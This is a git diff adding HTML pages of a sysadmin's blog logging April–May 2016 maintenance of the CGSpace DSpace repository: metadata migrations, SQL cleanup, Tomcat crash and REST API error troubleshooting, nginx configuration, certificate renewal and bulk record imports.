+<li>The following fields have some items using them and I have to decide what to do with them (delete or move):
+<ul>
+<li>dc.icsubject.icrafsubject: 6 items, mostly in CPWF collections</li>
+<li>dc.type.journal: 11 items, mostly in ILRI collections</li>
+<li>dc.publicationcategory: 1 item, in CPWF</li>
+<li>dc.GRP: 2 items, CPWF</li>
+<li>dc.Species.animal: 6 items, in ILRI and AnGR</li>
+<li>cg.livestock.agegroup: 9 items, in ILRI collections</li>
+<li>cg.livestock.function: 20 items, mostly in EADD</li>
+</ul>
+</li>
+<li>Test metadata migration on local instance again:</li>
+</ul>
+<pre tabindex="0"><code>$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40885
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51330
+UPDATE metadatavalue SET metadata_field_id=208 WHERE metadata_field_id=82
+UPDATE 5986
+UPDATE metadatavalue SET metadata_field_id=210 WHERE metadata_field_id=88
+UPDATE 2456
+UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
+UPDATE 3872
+UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
+UPDATE 46075
+$ JAVA_OPTS=&#34;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace index-discovery -bf
+</code></pre><ul>
+<li>CGSpace was down but I&rsquo;m not sure why, this was in <code>catalina.out</code>:</li>
+</ul>
+<pre tabindex="0"><code>Apr 18, 2016 7:32:26 PM com.sun.jersey.spi.container.ContainerResponse logException
+SEVERE: Mapped exception to response: 500 (Internal Server Error)
+javax.ws.rs.WebApplicationException
+        at org.dspace.rest.Resource.processFinally(Resource.java:163)
+        at org.dspace.rest.HandleResource.getObject(HandleResource.java:81)
+        at sun.reflect.GeneratedMethodAccessor198.invoke(Unknown Source)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:606)
+        at com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60)
+        at com.sun.jersey.server.impl.model.method.dispatch.AbstractResourceMethodDispatchProvider$TypeOutInvoker._dispatch(AbstractResourceMethodDispatchProvider.java:185)
+        at com.sun.jersey.server.impl.model.method.dispatch.ResourceJavaMethodDispatcher.dispatch(ResourceJavaMethodDispatcher.java:75)
+        at com.sun.jersey.server.impl.uri.rules.HttpMethodRule.accept(HttpMethodRule.java:302)
+        at com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147)
+        at com.sun.jersey.server.impl.uri.rules.ResourceClassRule.accept(ResourceClassRule.java:108)
+        at com.sun.jersey.server.impl.uri.rules.RightHandPathRule.accept(RightHandPathRule.java:147)
+        at com.sun.jersey.server.impl.uri.rules.RootResourceClassesRule.accept(RootResourceClassesRule.java:84)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1511)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl._handleRequest(WebApplicationImpl.java:1442)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1391)
+        at com.sun.jersey.server.impl.application.WebApplicationImpl.handleRequest(WebApplicationImpl.java:1381)
+        at com.sun.jersey.spi.container.servlet.WebComponent.service(WebComponent.java:416)
+...
+</code></pre><ul>
+<li>Everything else in the system looked normal (50GB disk space available, nothing weird in dmesg, etc)</li>
+<li>After restarting Tomcat a few more of these errors were logged but the application was up</li>
+</ul>
+<h2 id="2016-04-19">2016-04-19</h2>
+<ul>
+<li>Get handles for items that are using a given metadata field, ie <code>dc.Species.animal</code> (105):</li>
+</ul>
+<pre tabindex="0"><code># select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=105);
+   handle
+-------------
+ 10568/10298
+ 10568/16413
+ 10568/16774
+ 10568/34487
+</code></pre><ul>
+<li>Delete metadata values for <code>dc.GRP</code> and <code>dc.icsubject.icrafsubject</code>:</li>
+</ul>
+<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=96;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=83;
+</code></pre><ul>
+<li>They are old ICRAF fields and we haven&rsquo;t used them since 2011 or so</li>
+<li>Also delete them from the metadata registry</li>
+<li>CGSpace went down again, <code>dspace.log</code> had this:</li>
+</ul>
+<pre tabindex="0"><code>2016-04-19 15:02:17,025 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+</code></pre><ul>
+<li>I restarted Tomcat and PostgreSQL and now it&rsquo;s back up</li>
+<li>I bet this is the same crash as yesterday, but I only saw the errors in <code>catalina.out</code></li>
+<li>Looks to be related to this, from <code>dspace.log</code>:</li>
+</ul>
+<pre tabindex="0"><code>2016-04-19 15:16:34,670 ERROR org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
+</code></pre><ul>
+<li>We have 18,000 of these errors right now&hellip;</li>
+<li>Delete a few more old metadata values: <code>dc.Species.animal</code>, <code>dc.type.journal</code>, and <code>dc.publicationcategory</code>:</li>
+</ul>
+<pre tabindex="0"><code># delete from metadatavalue where resource_type_id=2 and metadata_field_id=105;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=85;
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=95;
+</code></pre><ul>
+<li>And then remove them from the metadata registry</li>
+</ul>
+<h2 id="2016-04-20">2016-04-20</h2>
+<ul>
+<li>Re-deploy DSpace Test with the new subject and type fields, run all system updates, and reboot the server</li>
+<li>Migrate fields and re-deploy CGSpace with the new subject and type fields, run all system updates, and reboot the server</li>
+<li>Field migration went well:</li>
+</ul>
+<pre tabindex="0"><code>$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40909
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51419
+UPDATE metadatavalue SET metadata_field_id=208 WHERE metadata_field_id=82
+UPDATE 5986
+UPDATE metadatavalue SET metadata_field_id=210 WHERE metadata_field_id=88
+UPDATE 2458
+UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
+UPDATE 3872
+UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
+UPDATE 46075
+</code></pre><ul>
+<li>Also, I migrated CGSpace to using the PGDG PostgreSQL repo as the infrastructure playbooks had been using it for a while and it seemed to be working well</li>
+<li>Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)</li>
+<li>Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-20
+21252
+</code></pre><ul>
+<li>I found a recent discussion on the DSpace mailing list and I&rsquo;ve asked for advice there</li>
+<li>Looks like this issue was noted and fixed in DSpace 5.5 (we&rsquo;re on 5.1): <a href="https://jira.duraspace.org/browse/DS-2936">https://jira.duraspace.org/browse/DS-2936</a></li>
+<li>I&rsquo;ve sent a message to Atmire asking about compatibility with DSpace 5.5</li>
+</ul>
+<h2 id="2016-04-21">2016-04-21</h2>
+<ul>
+<li>Fix a bunch of metadata consistency issues with IITA Journal Articles (Peer review, Formally published, messed up DOIs, etc)</li>
+<li>Atmire responded with DSpace 5.5 compatible versions for their modules, so I&rsquo;ll start testing those in a few weeks</li>
+</ul>
+<h2 id="2016-04-22">2016-04-22</h2>
+<ul>
+<li>Import 95 records into <a href="https://cgspace.cgiar.org/handle/10568/42219">CTA&rsquo;s Agrodok collection</a></li>
+</ul>
+<h2 id="2016-04-26">2016-04-26</h2>
+<ul>
+<li>Test embargo during item upload</li>
+<li>Seems to be working but the help text is misleading as to the date format</li>
+<li>It turns out the <code>robots.txt</code> issue we thought we solved last month isn&rsquo;t solved because you can&rsquo;t use wildcards in URL patterns: <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>Write some nginx rules to add <code>X-Robots-Tag</code> HTTP headers to the dynamic requests from <code>robots.txt</code> instead</li>
+<li>A few URLs to test with:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/440/browse?type=bioversity">https://dspacetest.cgiar.org/handle/10568/440/browse?type=bioversity</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/913/discover">https://dspacetest.cgiar.org/handle/10568/913/discover</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/1/search-filter?filtertype_0=country&amp;filter_0=VIETNAM&amp;filter_relational_operator_0=equals&amp;field=country">https://dspacetest.cgiar.org/handle/10568/1/search-filter?filtertype_0=country&amp;filter_0=VIETNAM&amp;filter_relational_operator_0=equals&amp;field=country</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2016-04-27">2016-04-27</h2>
+<ul>
+<li>I woke up to ten or fifteen &ldquo;up&rdquo; and &ldquo;down&rdquo; emails from the monitoring website</li>
+<li>Looks like the last one was &ldquo;down&rdquo; from about four hours ago</li>
+<li>I think there must be something with this REST stuff:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-*
+dspace.log.2016-04-01:0
+dspace.log.2016-04-02:0
+dspace.log.2016-04-03:0
+dspace.log.2016-04-04:0
+dspace.log.2016-04-05:0
+dspace.log.2016-04-06:0
+dspace.log.2016-04-07:0
+dspace.log.2016-04-08:0
+dspace.log.2016-04-09:0
+dspace.log.2016-04-10:0
+dspace.log.2016-04-11:0
+dspace.log.2016-04-12:235
+dspace.log.2016-04-13:44
+dspace.log.2016-04-14:0
+dspace.log.2016-04-15:35
+dspace.log.2016-04-16:0
+dspace.log.2016-04-17:0
+dspace.log.2016-04-18:11942
+dspace.log.2016-04-19:28496
+dspace.log.2016-04-20:28474
+dspace.log.2016-04-21:28654
+dspace.log.2016-04-22:28763
+dspace.log.2016-04-23:28773
+dspace.log.2016-04-24:28775
+dspace.log.2016-04-25:28626
+dspace.log.2016-04-26:28655
+dspace.log.2016-04-27:7271
+</code></pre><ul>
+<li>I restarted tomcat and it is back up</li>
+<li>Add Spanish XMLUI strings so those users see &ldquo;CGSpace&rdquo; instead of &ldquo;DSpace&rdquo; in the user interface (<a href="https://github.com/ilri/DSpace/pull/222">#222</a>)</li>
+<li>Submit patch to upstream DSpace for the misleading help text in the embargo step of the item submission: <a href="https://jira.duraspace.org/browse/DS-3172">https://jira.duraspace.org/browse/DS-3172</a></li>
+<li>Update infrastructure playbooks for nginx 1.10.x (stable) release: <a href="https://github.com/ilri/rmg-ansible-public/issues/32">https://github.com/ilri/rmg-ansible-public/issues/32</a></li>
+<li>Currently running on DSpace Test, we&rsquo;ll give it a few days before we adjust CGSpace</li>
+<li>CGSpace down, restarted tomcat and it&rsquo;s back up</li>
+</ul>
+<h2 id="2016-04-28">2016-04-28</h2>
+<ul>
+<li>Problems with stability again. I&rsquo;ve blocked access to <code>/rest</code> for now to see if the number of errors in the log files drop</li>
+<li>Later we could maybe start logging access to <code>/rest</code> and perhaps whitelist some IPs&hellip;</li>
+</ul>
+<h2 id="2016-04-30">2016-04-30</h2>
+<ul>
+<li>Logs for today and yesterday have zero references to this REST error, so I&rsquo;m going to open back up the REST API but log all requests</li>
+</ul>
+<pre tabindex="0"><code>location /rest {
+	access_log /var/log/nginx/rest.log;
+	proxy_pass http://127.0.0.1:8443;
+}
+</code></pre><ul>
+<li>I will check the logs again in a few days to look for patterns, see who is accessing it, etc</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html
new file mode 100644
index 000000000..66bf531ab
--- /dev/null
+++ b/docs/2016-05/index.html
@@ -0,0 +1,425 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2016" />
+<meta property="og:description" content="2016-05-01
+
+Since yesterday there have been 10,000 REST errors and the site has been unstable again
+I have blocked access to the API now
+There are 3,000 IPs accessing the REST API in a 24-hour period!
+
+# awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-05/" />
+<meta property="article:published_time" content="2016-05-01T23:06:00+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2016"/>
+<meta name="twitter:description" content="2016-05-01
+
+Since yesterday there have been 10,000 REST errors and the site has been unstable again
+I have blocked access to the API now
+There are 3,000 IPs accessing the REST API in a 24-hour period!
+
+# awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-05/",
+  "wordCount": "1349",
+  "datePublished": "2016-05-01T23:06:00+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-05/">
+
+    <title>May, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-05/">May, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-05-01">2016-05-01</h2>
+<ul>
+<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li>
+<li>I have blocked access to the API now</li>
+<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+</code></pre><ul>
+<li>The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29</li>
+<li>100% of the requests coming from Ethiopia are like this and result in an HTTP 500:</li>
+</ul>
+<pre tabindex="0"><code>GET /rest/handle/10568/NaN?expand=parentCommunityList,metadata HTTP/1.1
+</code></pre><ul>
+<li>For now I&rsquo;ll block just the Ethiopian IP</li>
+<li>The owner of that application has said that the <code>NaN</code> (not a number) is an error in his code and he&rsquo;ll fix it</li>
+</ul>
+<h2 id="2016-05-03">2016-05-03</h2>
+<ul>
+<li>Update nginx to 1.10.x branch on CGSpace</li>
+<li>Fix a reference to <code>dc.type.output</code> in Discovery that I had missed when we migrated to <code>dc.type</code> last month (<a href="https://github.com/ilri/DSpace/pull/223">#223</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/05/discovery-types.png" alt="Item type in Discovery results"></p>
+<h2 id="2016-05-06">2016-05-06</h2>
+<ul>
+<li>DSpace Test is down, <code>catalina.out</code> has lots of messages about heap space from some time yesterday (!)</li>
+<li>It looks like Sisay was doing some batch imports</li>
+<li>Hmm, also disk space is full</li>
+<li>I decided to blow away the solr indexes, since they are 50GB and we don&rsquo;t really need all the Atmire stuff there right now</li>
+<li>I will re-generate the Discovery indexes after re-deploying</li>
+<li>Testing <code>renew-letsencrypt.sh</code> script for nginx</li>
+</ul>
+<pre tabindex="0"><code>#!/usr/bin/env bash
+
+readonly SERVICE_BIN=/usr/sbin/service
+readonly LETSENCRYPT_BIN=/opt/letsencrypt/letsencrypt-auto
+
+# stop nginx so LE can listen on port 443
+$SERVICE_BIN nginx stop
+
+$LETSENCRYPT_BIN renew -nvv --standalone --standalone-supported-challenges tls-sni-01 &gt; /var/log/letsencrypt/renew.log 2&gt;&amp;1
+
+LE_RESULT=$?
+
+$SERVICE_BIN nginx start
+
+if [[ &#34;$LE_RESULT&#34; != 0 ]]; then
+    echo &#39;Automated renewal failed:&#39;
+
+    cat /var/log/letsencrypt/renew.log
+
+    exit 1
+fi
+</code></pre><ul>
+<li>Seems to work well</li>
+</ul>
+<h2 id="2016-05-10">2016-05-10</h2>
+<ul>
+<li>Start looking at more metadata migrations</li>
+<li>There are lots of fields in <code>dcterms</code> namespace that look interesting, like:
+<ul>
+<li>dcterms.type</li>
+<li>dcterms.spatial</li>
+</ul>
+</li>
+<li>Not sure what <code>dcterms</code> is&hellip;</li>
+<li>Looks like these were <a href="https://wiki.lyrasis.org/display/DSDOC5x/Metadata+and+Bitstream+Format+Registries#MetadataandBitstreamFormatRegistries-DublinCoreTermsRegistry(DCTERMS)">added in DSpace 4</a> to allow for future work to make DSpace more flexible</li>
+<li>CGSpace&rsquo;s <code>dc</code> registry has 96 items, and the default DSpace one has 73.</li>
+</ul>
+<h2 id="2016-05-11">2016-05-11</h2>
+<ul>
+<li>
+<p>Identify and propose the next phase of CGSpace fields to migrate:</p>
+<ul>
+<li>dc.title.jtitle      → cg.title.journal</li>
+<li>dc.identifier.status → cg.identifier.status</li>
+<li>dc.river.basin       → cg.river.basin</li>
+<li>dc.Species           → cg.species</li>
+<li>dc.targetaudience    → cg.targetaudience</li>
+<li>dc.fulltextstatus    → cg.fulltextstatus</li>
+<li>dc.editon            → cg.edition</li>
+<li>dc.isijournal        → cg.isijournal</li>
+</ul>
+</li>
+<li>
+<p>Start a test rebase of the <code>5_x-prod</code> branch on top of the <code>dspace-5.5</code> tag</p>
+</li>
+<li>
+<p>There were a handful of conflicts that I didn&rsquo;t understand</p>
+</li>
+<li>
+<p>After completing the rebase I tried to build with the module versions Atmire had indicated as being 5.5 ready but I got this error:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:5.5: Could not find artifact com.atmire:atmire-metadata-quality-api:jar:5.5-2.10.1-0 in sonatype-releases (https://oss.sonatype.org/content/repositories/releases/) -&gt; [Help 1]
+</code></pre><ul>
+<li>I&rsquo;ve sent them a question about it</li>
+<li>A user mentioned having problems with uploading a 33 MB PDF</li>
+<li>I told her I would increase the limit temporarily tomorrow morning</li>
+<li>Turns out she was able to decrease the size of the PDF so we didn&rsquo;t have to do anything</li>
+</ul>
+<h2 id="2016-05-12">2016-05-12</h2>
+<ul>
+<li>Looks like the issue that Abenet was having a few days ago with &ldquo;Connection Reset&rdquo; in Firefox might be due to a Firefox 46 issue: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1268775">https://bugzilla.mozilla.org/show_bug.cgi?id=1268775</a></li>
+<li>I finally found a copy of the latest CG Core metadata guidelines and it looks like we can add a few more fields to our next migration:
+<ul>
+<li>dc.rplace.region  → cg.coverage.region</li>
+<li>dc.cplace.country → cg.coverage.country</li>
+</ul>
+</li>
+<li>Questions for CG people:
+<ul>
+<li>Our <code>dc.place</code> and <code>dc.srplace.subregion</code> could both map to <code>cg.coverage.admin-unit</code>?</li>
+<li>Should we use <code>dc.contributor.crp</code> or <code>cg.contributor.crp</code> for the CRP (ours is <code>dc.crsubject.crpsubject</code>)?</li>
+<li>Our <code>dc.contributor.affiliation</code> and <code>dc.contributor.corporate</code> could both map to <code>dc.contributor</code> and possibly <code>dc.contributor.center</code> depending on if it&rsquo;s a CG center or not</li>
+<li><code>dc.title.jtitle</code> could either map to <code>dc.publisher</code> or <code>dc.source</code> depending on how you read things</li>
+</ul>
+</li>
+<li>Found ~200 messed up CIAT values in <code>dc.publisher</code>:</li>
+</ul>
+<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &#34;%  %&#34;;
+</code></pre><h2 id="2016-05-13">2016-05-13</h2>
+<ul>
+<li>More theorizing about CGcore</li>
+<li>Add two new fields:
+<ul>
+<li>dc.srplace.subregion → cg.coverage.admin-unit</li>
+<li>dc.place → cg.place</li>
+</ul>
+</li>
+<li><code>dc.place</code> is our own field, so it&rsquo;s easy to move</li>
+<li>I&rsquo;ve removed <code>dc.title.jtitle</code> from the list for now because there&rsquo;s no use moving it out of DC until we know where it will go (see discussion yesterday)</li>
+</ul>
+<h2 id="2016-05-18">2016-05-18</h2>
+<ul>
+<li>Work on 707 CCAFS records</li>
+<li>They have thumbnails on Flickr and elsewhere</li>
+<li>In OpenRefine I created a new <code>filename</code> column based on the <code>thumbnail</code> column with the following GREL:</li>
+</ul>
+<pre tabindex="0"><code>if(cells[&#39;thumbnails&#39;].value.contains(&#39;hqdefault&#39;), cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-2] + &#39;.jpg&#39;, cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-1])
+</code></pre><ul>
+<li>Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL</li>
+<li>So for the <code>hqdefault.jpg</code> ones I just take the UUID (-2) and use it as the filename</li>
+<li>Before importing with SAFBuilder I tested adding &ldquo;__bundle:THUMBNAIL&rdquo; to the <code>filename</code> column and it works fine</li>
+</ul>
+<h2 id="2016-05-19">2016-05-19</h2>
+<ul>
+<li>More quality control on <code>filename</code> field of CCAFS records to make processing in shell and SAFBuilder more reliable:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#39;_&#39;,&#39;&#39;).replace(&#39;-&#39;,&#39;&#39;)
+</code></pre><ul>
+<li>We need to hold off on moving <code>dc.Species</code> to <code>cg.species</code> because it is only used for plants, and might be better to move it to something like <code>cg.species.plant</code></li>
+<li>And <code>dc.identifier.fund</code> is MOSTLY used for CPWF project identifier but has some other sponsorship things
+<ul>
+<li>We should move PN*, SG*, CBA, IA, and PHASE* values to <code>cg.identifier.cpwfproject</code></li>
+<li>The rest, like BMGF and USAID etc, might have to go to either <code>dc.description.sponsorship</code> or <code>cg.identifier.fund</code> (not sure yet)</li>
+<li>There are also some mistakes in CPWF&rsquo;s things, like &ldquo;PN 47&rdquo;</li>
+<li>This ought to catch all the CPWF values (there don&rsquo;t appear to be and SG* values):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
+</code></pre><h2 id="2016-05-20">2016-05-20</h2>
+<ul>
+<li>More work on CCAFS Video and Images records</li>
+<li>For SAFBuilder we need to modify filename column to have the thumbnail bundle:</li>
+</ul>
+<pre tabindex="0"><code>value + &#34;__bundle:THUMBNAIL&#34;
+</code></pre><ul>
+<li>Also, I fixed some weird characters using OpenRefine&rsquo;s transform with the following GREL:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(/\u0081/,&#39;&#39;)
+</code></pre><ul>
+<li>Write shell script to resize thumbnails with height larger than 400: <a href="https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256">https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256</a></li>
+<li>Upload 707 CCAFS records to DSpace Test</li>
+<li>A few miscellaneous fixes for XMLUI display niggles (spaces in item lists and link target <code>_black</code>): <a href="https://github.com/ilri/DSpace/pull/224">#224</a></li>
+<li>Work on configuration changes for Phase 2 metadata migrations</li>
+</ul>
+<h2 id="2016-05-23">2016-05-23</h2>
+<ul>
+<li>Try to import the CCAFS Images and Videos to CGSpace but had some issues with LibreOffice and OpenRefine</li>
+<li>LibreOffice excludes empty cells when it exports and all the fields shift over to the left and cause URLs to go to Subjects, etc.</li>
+<li>Google Docs does this better, but somehow reorders the rows and when I paste the thumbnail/filename row in they don&rsquo;t match!</li>
+<li>I will have to try later</li>
+</ul>
+<h2 id="2016-05-30">2016-05-30</h2>
+<ul>
+<li>Export CCAFS video and image records from DSpace Test using the migrate option (<code>-m</code>):</li>
+</ul>
+<pre tabindex="0"><code>$ mkdir ~/ccafs-images
+$ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~/ccafs-images -n 0 -m
+</code></pre><ul>
+<li>And then import to CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
+</code></pre><ul>
+<li>But now we have double authors for &ldquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rdquo; in the authority</li>
+<li>I&rsquo;m trying to do a Discovery index before messing with the authority index</li>
+<li>Looks like we are missing the <code>index-authority</code> cron job, so who knows what&rsquo;s up with our authority index</li>
+<li>Run system updates on DSpace Test, re-deploy code, and reboot the server</li>
+<li>Clean up and import ~200 CTA records to CGSpace via CSV like:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
+$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &amp;&gt; ~/CTA-May30/CTA-42229.log
+</code></pre><ul>
+<li>Discovery indexing took a few hours for some reason, and after that I started the <code>index-authority</code> script</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace index-authority
+</code></pre><h2 id="2016-05-31">2016-05-31</h2>
+<ul>
+<li>The <code>index-authority</code> script ran over night and was finished in the morning</li>
+<li>Hopefully this was because we haven&rsquo;t been running it regularly and it will speed up next time</li>
+<li>I am running it again with a timer to see:</li>
+</ul>
+<pre tabindex="0"><code>$ time /home/cgspace.cgiar.org/bin/dspace index-authority
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Cleaning the old index
+Writing new data
+All done !
+
+real    37m26.538s
+user    2m24.627s
+sys     0m20.540s
+</code></pre><ul>
+<li>Update <code>tomcat7</code> crontab on CGSpace and DSpace Test to have the <code>index-authority</code> script that we were missing</li>
+<li>Add new ILRI subject and CCAFS project tags to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/226">#226</a>, <a href="https://github.com/ilri/DSpace/pull/225">#225</a>)</li>
+<li>Manually mapped the authors of a few old CCAFS records to the new CCAFS authority UUID and re-indexed authority indexes to see if it helps correct those items.</li>
+<li>Re-sync DSpace Test data with CGSpace</li>
